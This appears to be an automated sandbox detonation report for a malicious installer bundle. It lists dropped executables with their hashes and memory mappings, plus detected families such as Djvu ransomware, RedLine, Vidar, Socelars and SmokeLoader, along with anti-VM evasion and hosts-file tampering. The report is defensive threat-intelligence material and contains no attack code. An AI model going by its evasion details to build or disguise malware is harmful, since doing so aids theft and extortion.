SHA256 fac205247d3b19b5f82f5f4d1269a5c047b6c9ad9f21cc51b4b782c2b08a3b87
SHA512 9578fc34807be2541aa7dc26acbe27211e96b42c6c4208afe195b19b08264dfeb3ea7fec637c759f062cbd5561c5140ecd68cd5c79efbb844d3b2639e336ca0c

memory/4968-150-0x0000000000000000-mapping.dmp

memory/4892-143-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat199ba8a4637dcb034.exe

MD5 5af7bc821a1501b38c4b153fa0f5dade
SHA1 467635cce64ae4e3ce41d1819d2ec6abdf5414f3
SHA256 773f2e6660cc3a2b3bb55c0b88a74d24db0dfc5c0cef7c5b13ec9aac48f5d6b6
SHA512 53fd58565d6ca16fc9ca7113cd90657ef8c09fa2efcc9603f6da5c2a3050aaeb1d8edfc46b2b40d80b44a8ccce27d9e4fc6bac62bac236fdc360ebdab3b5c146

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat1946eb84e6.exe

MD5 a1c7ed2563212e0aba70af8a654962fd
SHA1 987e944110921327adaba51d557dbf20dee886d5
SHA256 a15773680b31415eeebf20246f283857bda7e7dda16f4674c2cbeba2106e3592
SHA512 60d827b6d36d6f3a1b4af445b25f26812043d2be8934c338d29b8a1bbe0b50d8a7c06f54ea14afa1d9dbbc6340c649dc51b0ae12d77329e1fb6fdf99e896a462

memory/4852-139-0x0000000000000000-mapping.dmp

memory/4872-141-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat191649b47c9e2.exe

MD5 b904fb528fafefae5c59553a8c31291d
SHA1 0dc01712e88d5bb47cc8fb02678eb46466cc2442
SHA256 717b0790a5cc5b577fb2535effc00fb58a3d62e55537a3d3ae0bf6639e8c9474
SHA512 5a795d4bde04e489e688899937708bd6910d2a36d2b50397fca91590bb6e74921102cf1e4a52405488c6c4aeba92565794470007d6bb1e2f029d17d2095fa1ac

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe

MD5 f1e2bb0a62bf371a71b62224b18a69b8
SHA1 872738f6cac0e95a4a0625f9d6b6788cf0dbdfa2
SHA256 aec3efab3db88776950250c0bdc2a3be0e8fdb9c07fbcef83549bfa3bedc34ab
SHA512 ce257f0686c9552759f3d06d8218ac4c5c16350fb673843f06d188aeb8bb531fcf7f29a61c60ef52944e6f72ccfe91adff993c791959585c2fe7f1a1c1fe88f6

memory/5048-197-0x0000000002DD0000-0x0000000002E18000-memory.dmp

memory/4968-198-0x0000000006E20000-0x0000000006E21000-memory.dmp

memory/4968-199-0x0000000007600000-0x0000000007601000-memory.dmp

memory/4968-200-0x0000000007670000-0x0000000007671000-memory.dmp

memory/4968-201-0x00000000076E0000-0x00000000076E1000-memory.dmp

memory/2808-202-0x0000000000000000-mapping.dmp

memory/2808-206-0x0000000000F80000-0x0000000000F81000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 d75734d85b59bdb7202e3c4b9def3631
SHA1 e6f713d88cce2df494095342e6734ea3cf59df0d
SHA256 600df54efe0bcdd1b2c7c8de1b821ff20d7ccc702479793324fc93ca7fd7a91c
SHA512 270b14765e24afacf7328fa409b59d5102bdd13d18968845796eb31e487f45118d34244c2c1f737c539ba612fd0dba0d1d08488debe2b7859f2d4b3d45810311

memory/5048-203-0x0000000000400000-0x0000000002B6B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 d75734d85b59bdb7202e3c4b9def3631
SHA1 e6f713d88cce2df494095342e6734ea3cf59df0d
SHA256 600df54efe0bcdd1b2c7c8de1b821ff20d7ccc702479793324fc93ca7fd7a91c
SHA512 270b14765e24afacf7328fa409b59d5102bdd13d18968845796eb31e487f45118d34244c2c1f737c539ba612fd0dba0d1d08488debe2b7859f2d4b3d45810311

memory/4420-208-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-PJJ1J.tmp\46807GHF____.exe

MD5 07470f6ad88ca277d3193ccca770d3b3
SHA1 1d323f05cc25310787e87f4fa4557393a05c8c7f
SHA256 b6c1a2841a02de3650633b8516f8ea7c9cfb0dc4ad0b307f6fa4d45ccac7aa19
SHA512 b47582f1230213a2f52f1f55fcb9b4390c52dfc6cc064415f097463bc28f5631962f98dc4fb576935d5304ad1249d28eff869727d1f425feb9821e9b120bcd80

C:\Users\Admin\AppData\Local\Temp\is-PJJ1J.tmp\46807GHF____.exe

MD5 07470f6ad88ca277d3193ccca770d3b3
SHA1 1d323f05cc25310787e87f4fa4557393a05c8c7f
SHA256 b6c1a2841a02de3650633b8516f8ea7c9cfb0dc4ad0b307f6fa4d45ccac7aa19
SHA512 b47582f1230213a2f52f1f55fcb9b4390c52dfc6cc064415f097463bc28f5631962f98dc4fb576935d5304ad1249d28eff869727d1f425feb9821e9b120bcd80

memory/3396-211-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

MD5 93460c75de91c3601b4a47d2b99d8f94
SHA1 f2e959a3291ef579ae254953e62d098fe4557572
SHA256 0fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2
SHA512 4370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856

memory/824-214-0x0000000000000000-mapping.dmp

memory/4124-216-0x00000000017E0000-0x00000000017E9000-memory.dmp

C:\ProgramData\6142391.exe

MD5 d3502a1369d09902d246e5a172bda5e6
SHA1 aab2040bc51ecb0dd2678f44c68cfbd722704a28
SHA256 912719650b5facfcb89b623b32a58780426cb4c9d36761c50a80c73bf783e94c
SHA512 5fa99e666d2006afffef54ec87ba347c28881d64c47c995788e291e1cd9048231ab620a30ed89ca3e04ebaf19737685ed4165473521f99f44b318499a9aa66d4

memory/4124-221-0x0000000000400000-0x0000000001788000-memory.dmp

memory/4420-222-0x0000000002390000-0x0000000002392000-memory.dmp

memory/4968-225-0x0000000007BB0000-0x0000000007BB1000-memory.dmp

memory/3856-227-0x0000000000400000-0x00000000017F2000-memory.dmp

memory/1224-230-0x0000000000720000-0x0000000000721000-memory.dmp

memory/1624-231-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 3bef291868337302198597f1e49e11cb
SHA1 705a5efb3feddf5758c0ff3ff27f8dc2c78ccd64
SHA256 7b8d7b971e0505f5ebfd9c726e8435878c6077ce2b235f2f647f7b5c21c2980b
SHA512 85d96a08642d0ef59312c275c33dfdf5db3eb4b3fbfd48ec88d590cf28a2debe86b415d830fa8c3f87386ac788448887aef1b1911728e82a5b778d3f458730df

memory/1788-240-0x0000000000C30000-0x0000000000C31000-memory.dmp

memory/1224-241-0x0000000000E30000-0x0000000000E31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 3bef291868337302198597f1e49e11cb
SHA1 705a5efb3feddf5758c0ff3ff27f8dc2c78ccd64
SHA256 7b8d7b971e0505f5ebfd9c726e8435878c6077ce2b235f2f647f7b5c21c2980b
SHA512 85d96a08642d0ef59312c275c33dfdf5db3eb4b3fbfd48ec88d590cf28a2debe86b415d830fa8c3f87386ac788448887aef1b1911728e82a5b778d3f458730df

memory/1224-246-0x0000000000E60000-0x0000000000E7B000-memory.dmp

memory/2196-245-0x0000000000000000-mapping.dmp

memory/1624-243-0x0000000000EC0000-0x0000000000EC1000-memory.dmp

memory/3576-251-0x0000000000000000-mapping.dmp

memory/824-250-0x000000001B110000-0x000000001B112000-memory.dmp

memory/1788-253-0x0000000001400000-0x0000000001402000-memory.dmp

memory/1624-255-0x0000000008020000-0x0000000008021000-memory.dmp

memory/4548-257-0x0000000000000000-mapping.dmp

memory/4968-259-0x0000000007F40000-0x0000000007F41000-memory.dmp

C:\ProgramData\1464811.exe

MD5 b1ef16d34497d921e4cd574fff8965e4
SHA1 3b959651330acccd31e5646575c889a3861bdcda
SHA256 3776ad134256d78e535c3fc72e576d91f58f80f26c7e69f0d5cd8f6648a40ef8
SHA512 d033ca7c732cb63cc0557760589372f53aeada5d1eb735aab2072823f2cadd2bdb3ae412682e4f1ab40dd4b805424b9580d9ff46d51a6f123de1e32b84ef11f6

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

MD5 3f85c284c00d521faf86158691fd40c5
SHA1 ee06d5057423f330141ecca668c5c6f9ccf526af
SHA256 28915433217ce96922b912651ae21974beba3a35aab6c228d5e96e296c8925dc
SHA512 0458856a88a11d259595c9c9ec105131c155fffb9c039b492e961b6aaf89ecec4e2d057fd6a2305f55303e777e08346a437dc22741ed288fb84d6d37b814d492

memory/4928-267-0x0000000000000000-mapping.dmp

memory/4548-266-0x0000000000B70000-0x0000000000B71000-memory.dmp

memory/2752-276-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

MD5 068565654f0bbe81d602e7afa851201d
SHA1 108c21228fedab58d897af46c7bd0e57438ccf3e
SHA256 d55d5c14f6759edcded7cd9ec5d6cc430abc90ebe07224b599a26449d241b73d
SHA512 4bac7eb52e8f40511f462bacce5cb80f8b43d8f76c7331b0908b36a4c372bd483f050d1fff34cff3c5a360fb49ad32869225d0d0eb1097df80d05181646ca68a

memory/4232-286-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

MD5 e4ff121d36dff8e94df4e718ecd84aff
SHA1 b84af5dae944bbf34d289d7616d2fef09dab26b7
SHA256 2a019bc6bace686b08286ee7d8e2e66c18283b162d27774c486037c940dc60cc
SHA512 141f12468cfe737b3694a4ece8f17c5d35bbade05ee0538fe4ef4fccf61584374f79a474fd4bf82685a4840afd94e9a9bbd9c9f357cb342dda9f89109c4da5f4

memory/3268-291-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4548-294-0x00000000054D0000-0x00000000054D3000-memory.dmp

memory/3268-293-0x000000000041C5E2-mapping.dmp

memory/4232-292-0x0000000005640000-0x0000000005641000-memory.dmp

memory/3940-298-0x0000000000000000-mapping.dmp

memory/4548-290-0x0000000005340000-0x000000000583E000-memory.dmp

memory/4548-284-0x0000000005310000-0x0000000005328000-memory.dmp

memory/2152-306-0x0000000000000000-mapping.dmp

memory/3940-307-0x0000000000400000-0x0000000000414000-memory.dmp

memory/700-311-0x0000000000000000-mapping.dmp

memory/4012-312-0x0000000000000000-mapping.dmp

memory/480-314-0x00000000003C0000-0x00000000003C1000-memory.dmp

memory/3268-317-0x0000000004820000-0x0000000004821000-memory.dmp

memory/3268-315-0x0000000004E10000-0x0000000004E11000-memory.dmp

memory/480-309-0x0000000000000000-mapping.dmp

memory/592-308-0x0000000000000000-mapping.dmp

memory/2752-304-0x0000000005130000-0x0000000005131000-memory.dmp

memory/3268-303-0x0000000000400000-0x0000000000401000-memory.dmp

memory/3052-301-0x0000000001040000-0x0000000001055000-memory.dmp

memory/700-319-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

memory/2196-324-0x0000000002CA0000-0x0000000002DEA000-memory.dmp

memory/904-326-0x0000000000000000-mapping.dmp

memory/4984-325-0x0000000000000000-mapping.dmp

memory/592-321-0x00000000001E0000-0x00000000001E1000-memory.dmp

memory/2752-302-0x0000000007550000-0x0000000007551000-memory.dmp

memory/4636-300-0x00000000001E0000-0x00000000001E1000-memory.dmp

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

MD5 068565654f0bbe81d602e7afa851201d
SHA1 108c21228fedab58d897af46c7bd0e57438ccf3e
SHA256 d55d5c14f6759edcded7cd9ec5d6cc430abc90ebe07224b599a26449d241b73d
SHA512 4bac7eb52e8f40511f462bacce5cb80f8b43d8f76c7331b0908b36a4c372bd483f050d1fff34cff3c5a360fb49ad32869225d0d0eb1097df80d05181646ca68a

memory/4232-281-0x0000000000000000-mapping.dmp

memory/1220-335-0x0000000000000000-mapping.dmp

memory/3268-338-0x0000000004800000-0x0000000004E06000-memory.dmp

memory/4012-343-0x0000000005440000-0x0000000005441000-memory.dmp

memory/1640-344-0x0000000000000000-mapping.dmp

memory/904-345-0x0000000005640000-0x0000000005B3E000-memory.dmp

memory/2196-348-0x0000000000400000-0x0000000002B5D000-memory.dmp

memory/520-347-0x0000000000000000-mapping.dmp

memory/640-351-0x000000000041C5EE-mapping.dmp

memory/700-342-0x00000000056C0000-0x00000000056C1000-memory.dmp

memory/480-340-0x000000001B260000-0x000000001B262000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-ELF00.tmp\setup_2.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-ELF00.tmp\setup_2.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

memory/4636-275-0x0000000000000000-mapping.dmp

memory/4548-274-0x0000000005600000-0x0000000005601000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\udptest.exe

MD5 f1cd08ca29a2add76e5b0464750c645b
SHA1 929de2a20f5d82b333f95213c955e90e2e0fc66c
SHA256 0cb33bdee818c06cd3e34b8b3a2a0f4120bd91527ef87406f4086bd2841ef5ec
SHA512 4ae6b8729b1ff8061839c0ba8f5a13ce50e5746fab4ed4fadd2e2aab1a9ad31198ca31d8748d64f7011a361e253b29ca2b4112ad201c670fb38f95b5068c6687

memory/4116-272-0x0000000000000000-mapping.dmp

memory/4592-271-0x0000000000400000-0x0000000000414000-memory.dmp

memory/5380-364-0x0000000000000000-mapping.dmp

memory/520-365-0x0000000005000000-0x0000000005001000-memory.dmp

memory/3576-369-0x0000000002B70000-0x0000000002CBA000-memory.dmp

memory/640-367-0x0000000004C80000-0x0000000005286000-memory.dmp

memory/5360-362-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3002.exe

MD5 e511bb4cf31a2307b6f3445a869bcf31
SHA1 76f5c6e8df733ac13d205d426831ed7672a05349
SHA256 56002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137
SHA512 9c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

MD5 3f85c284c00d521faf86158691fd40c5
SHA1 ee06d5057423f330141ecca668c5c6f9ccf526af
SHA256 28915433217ce96922b912651ae21974beba3a35aab6c228d5e96e296c8925dc
SHA512 0458856a88a11d259595c9c9ec105131c155fffb9c039b492e961b6aaf89ecec4e2d057fd6a2305f55303e777e08346a437dc22741ed288fb84d6d37b814d492

C:\ProgramData\1464811.exe

MD5 b1ef16d34497d921e4cd574fff8965e4
SHA1 3b959651330acccd31e5646575c889a3861bdcda
SHA256 3776ad134256d78e535c3fc72e576d91f58f80f26c7e69f0d5cd8f6648a40ef8
SHA512 d033ca7c732cb63cc0557760589372f53aeada5d1eb735aab2072823f2cadd2bdb3ae412682e4f1ab40dd4b805424b9580d9ff46d51a6f123de1e32b84ef11f6

memory/4592-260-0x0000000000000000-mapping.dmp

memory/1624-258-0x0000000007C00000-0x0000000007C01000-memory.dmp

memory/4968-382-0x000000007F180000-0x000000007F181000-memory.dmp

memory/3576-385-0x0000000007252000-0x0000000007253000-memory.dmp

memory/3576-388-0x0000000000400000-0x0000000002B6D000-memory.dmp

memory/3576-392-0x0000000007253000-0x0000000007254000-memory.dmp

memory/3576-390-0x0000000007250000-0x0000000007251000-memory.dmp

memory/5584-379-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\udptest.exe

MD5 f1cd08ca29a2add76e5b0464750c645b
SHA1 929de2a20f5d82b333f95213c955e90e2e0fc66c
SHA256 0cb33bdee818c06cd3e34b8b3a2a0f4120bd91527ef87406f4086bd2841ef5ec
SHA512 4ae6b8729b1ff8061839c0ba8f5a13ce50e5746fab4ed4fadd2e2aab1a9ad31198ca31d8748d64f7011a361e253b29ca2b4112ad201c670fb38f95b5068c6687

memory/1224-254-0x000000001B370000-0x000000001B372000-memory.dmp

memory/1624-252-0x0000000002F40000-0x0000000002F44000-memory.dmp

memory/1224-249-0x0000000000E40000-0x0000000000E41000-memory.dmp

memory/3576-399-0x0000000007254000-0x0000000007256000-memory.dmp

memory/4968-401-0x00000000043D3000-0x00000000043D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 234fad127f21b6119124e83d9612dc75
SHA1 01de838b449239a5ea356c692f1f36cd0e3a27fd
SHA256 32668075f8c859636cb19de60d5ddc6e4fa1bfbc94eb6504636946d641110876
SHA512 41618ad70dc6296200471ce85be320502425730b84cb3b92f9295725746c024593811c61addc4c15c1a3d51227e50e159bc09c8d75b6029476c5b8afaacba002

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 234fad127f21b6119124e83d9612dc75
SHA1 01de838b449239a5ea356c692f1f36cd0e3a27fd
SHA256 32668075f8c859636cb19de60d5ddc6e4fa1bfbc94eb6504636946d641110876
SHA512 41618ad70dc6296200471ce85be320502425730b84cb3b92f9295725746c024593811c61addc4c15c1a3d51227e50e159bc09c8d75b6029476c5b8afaacba002

memory/824-237-0x0000000000800000-0x000000000081E000-memory.dmp

C:\ProgramData\4221052.exe

MD5 068565654f0bbe81d602e7afa851201d
SHA1 108c21228fedab58d897af46c7bd0e57438ccf3e
SHA256 d55d5c14f6759edcded7cd9ec5d6cc430abc90ebe07224b599a26449d241b73d
SHA512 4bac7eb52e8f40511f462bacce5cb80f8b43d8f76c7331b0908b36a4c372bd483f050d1fff34cff3c5a360fb49ad32869225d0d0eb1097df80d05181646ca68a

memory/4968-235-0x0000000007C00000-0x0000000007C01000-memory.dmp

C:\ProgramData\4221052.exe

MD5 068565654f0bbe81d602e7afa851201d
SHA1 108c21228fedab58d897af46c7bd0e57438ccf3e
SHA256 d55d5c14f6759edcded7cd9ec5d6cc430abc90ebe07224b599a26449d241b73d
SHA512 4bac7eb52e8f40511f462bacce5cb80f8b43d8f76c7331b0908b36a4c372bd483f050d1fff34cff3c5a360fb49ad32869225d0d0eb1097df80d05181646ca68a

memory/1788-233-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

MD5 926fbc9261cf783ea941891e0644c0c5
SHA1 d90c0f8a499dcf2a7d5a92c316f2b736d999f7d3
SHA256 bfc101337c0065cd9f844ce03b3db348940a28acd6cbb5e0c0adf230c2850805
SHA512 91b4de74719f538dbe92eec6dcae0f4453adc2626adaee0d1ce705f97ed2fe9d47e6f25f7e692c0383a11a9c6812ca1bcd59274eb71b1de9584a3aefb10da49f

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

MD5 926fbc9261cf783ea941891e0644c0c5
SHA1 d90c0f8a499dcf2a7d5a92c316f2b736d999f7d3
SHA256 bfc101337c0065cd9f844ce03b3db348940a28acd6cbb5e0c0adf230c2850805
SHA512 91b4de74719f538dbe92eec6dcae0f4453adc2626adaee0d1ce705f97ed2fe9d47e6f25f7e692c0383a11a9c6812ca1bcd59274eb71b1de9584a3aefb10da49f

memory/1224-224-0x0000000000000000-mapping.dmp

memory/824-223-0x0000000000300000-0x0000000000301000-memory.dmp

memory/3856-219-0x0000000003510000-0x00000000035E1000-memory.dmp

C:\ProgramData\6142391.exe

MD5 d3502a1369d09902d246e5a172bda5e6
SHA1 aab2040bc51ecb0dd2678f44c68cfbd722704a28
SHA256 912719650b5facfcb89b623b32a58780426cb4c9d36761c50a80c73bf783e94c
SHA512 5fa99e666d2006afffef54ec87ba347c28881d64c47c995788e291e1cd9048231ab620a30ed89ca3e04ebaf19737685ed4165473521f99f44b318499a9aa66d4

memory/3396-215-0x0000000000F30000-0x0000000000F31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

MD5 93460c75de91c3601b4a47d2b99d8f94
SHA1 f2e959a3291ef579ae254953e62d098fe4557572
SHA256 0fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2
SHA512 4370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856

memory/5868-403-0x0000000000000000-mapping.dmp

memory/5932-406-0x0000000000000000-mapping.dmp

memory/5996-412-0x0000000000000000-mapping.dmp

memory/848-427-0x0000000000000000-mapping.dmp

memory/5132-424-0x0000000000000000-mapping.dmp

memory/3644-477-0x0000000000000000-mapping.dmp

memory/5636-483-0x0000000000000000-mapping.dmp

memory/3644-484-0x00000000031A0000-0x00000000031A1000-memory.dmp

memory/5920-490-0x00007FF665094060-mapping.dmp

memory/5636-495-0x0000000004200000-0x000000000425F000-memory.dmp

memory/5636-493-0x00000000040F0000-0x00000000041F1000-memory.dmp

memory/5920-498-0x000001F3A5240000-0x000001F3A52B4000-memory.dmp

memory/2412-499-0x000001E0A9620000-0x000001E0A9694000-memory.dmp

memory/3644-500-0x0000000005230000-0x000000000537B000-memory.dmp

memory/3644-503-0x0000000005440000-0x00000000054F6000-memory.dmp

memory/2440-504-0x00000223924B0000-0x0000022392524000-memory.dmp

memory/2640-505-0x000001F0190A0000-0x000001F0190ED000-memory.dmp

memory/2640-507-0x000001F019400000-0x000001F019474000-memory.dmp

memory/348-509-0x000001A3680A0000-0x000001A368114000-memory.dmp

memory/1084-510-0x000001C129240000-0x000001C1292B4000-memory.dmp

memory/848-513-0x0000000000000000-mapping.dmp

memory/956-521-0x000001F81C640000-0x000001F81C6B4000-memory.dmp

memory/1852-522-0x00000282CA940000-0x00000282CA9B4000-memory.dmp

memory/848-523-0x0000000000400000-0x0000000000416000-memory.dmp

memory/5432-526-0x0000000000D60000-0x0000000000D62000-memory.dmp

memory/1404-528-0x000002A9413D0000-0x000002A941444000-memory.dmp

memory/1236-531-0x000001E0A3500000-0x000001E0A3574000-memory.dmp

memory/5312-530-0x00000000001E0000-0x00000000001E1000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-11 20:41

Reported

2021-09-11 21:12

Platform

win7-jp

Max time kernel

464s

Max time network

1812s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

Signatures

Djvu Ransomware

ransomware djvu

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Checks for common network interception software

evasion

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build3.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat191649b47c9e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat199ba8a4637dcb034.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19f84b58b3d7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NRU1I.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\ProgramData\3086290.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VQ6S5.tmp\46807GHF____.exe N/A
N/A N/A C:\ProgramData\4676496.exe N/A
N/A N/A C:\ProgramData\8557825.exe N/A
N/A N/A C:\ProgramData\1596296.exe N/A
N/A N/A C:\ProgramData\3769868.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\ProgramData\8557825.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udptest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3002.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jhuuee.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3002.exe N/A
N/A N/A C:\ProgramData\5552630.exe N/A
N/A N/A C:\ProgramData\5523242.exe N/A
N/A N/A C:\ProgramData\5930282.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4EDRO.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\ProgramData\1318651.exe N/A
N/A N/A C:\ProgramData\5258754.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JV285.tmp\setup_2.tmp N/A
N/A N/A C:\ProgramData\5930282.exe N/A
N/A N/A C:\Program Files\7-Zip\WJIDREWJFA\ultramediaburner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\de-36b7b-4d2-084b0-d2dd3d2ab45e5\Kagymaelaehae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TFGKB.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05-331a7-577-75fbd-48979e7bb6800\Kusaqujyky.exe N/A
N/A N/A C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19e4750dd01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-1KSJS.tmp\postback.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\z9Jllew4h.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ViqTvaztw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tbq3yagx.plh\GcleanerEU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3t4qjarg.bub\anyname.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0hufpbrq.aup\gcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EAFB.exe N/A
